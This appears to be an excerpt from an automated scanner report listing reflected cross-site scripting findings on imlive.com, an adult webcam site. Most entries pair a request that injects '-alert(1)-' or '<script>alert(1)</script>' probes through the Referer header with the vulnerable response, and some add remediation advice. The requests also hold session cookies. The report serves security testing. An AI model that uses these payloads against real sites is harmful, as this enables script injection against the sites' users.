GET /live-sex-chats/sex-video-features/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=b2392'-alert(1)-'0c423d5641
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 31786 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... vascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/&rf=http://www.google.com/search?hl=en^q=b2392'-alert(1)-'0c423d5641&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0352'-alert(1)-'ab159ea3fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=f0352'-alert(1)-'ab159ea3fa
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:14 GMT Connection: close Content-Length: 91916 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/&rf=http://www.google.com/search?hl=en^q=f0352'-alert(1)-'ab159ea3fa&qs=cat=1^roomid=557&qs=cat=1^roomid=557&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2760'-alert(1)-'c5e2447e511 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=e2760'-alert(1)-'c5e2447e511
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:39 GMT Connection: close Content-Length: 223783 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/&rf=http://www.google.com/search?hl=en^q=e2760'-alert(1)-'c5e2447e511&qs=cat=1^roomid=51&qs=cat=1^roomid=51&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1836d'-alert(1)-'bf279291bec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shy-girl/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=1836d'-alert(1)-'bf279291bec
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:05 GMT Connection: close Content-Length: 165183 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/&rf=http://www.google.com/search?hl=en^q=1836d'-alert(1)-'bf279291bec&qs=cat=1^roomid=160&qs=cat=1^roomid=160&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aed8'><script>alert(1)</script>84ff86f7007 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /liveexperts.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=7aed8'><script>alert(1)</script>84ff86f7007
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:45 GMT Connection: close Content-Length: 19453 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp&lr=1107816009&ud=0&pe=liveexperts.asp&rf=http://www.google.com/search?hl=en^q=7aed8'><script>alert(1)</script>84ff86f7007&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15f39'><script>alert(1)</script>2c5aaf7e464 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /localcompanionship.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=15f39'><script>alert(1)</script>2c5aaf7e464
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:47 GMT Connection: close Content-Length: 16612 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp&lr=1107816009&ud=0&pe=localcompanionship.asp&rf=http://www.google.com/search?hl=en^q=15f39'><script>alert(1)</script>2c5aaf7e464&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 266c7'-alert(1)-'ee0d8af970d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=266c7'-alert(1)-'ee0d8af970d
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31ad7'><script>alert(1)</script>1b6d1621049 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /minglesingles.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=31ad7'><script>alert(1)</script>1b6d1621049
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:45 GMT Connection: close Content-Length: 16176 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp&lr=1107816009&ud=0&pe=minglesingles.asp&rf=http://www.google.com/search?hl=en^q=31ad7'><script>alert(1)</script>1b6d1621049&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa9af'><script>alert(1)</script>4ba405bce21 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=fa9af'><script>alert(1)</script>4ba405bce21
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:52 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:52 GMT Connection: close Content-Length: 9919 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198f8'-alert(1)-'996d2f33bb5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
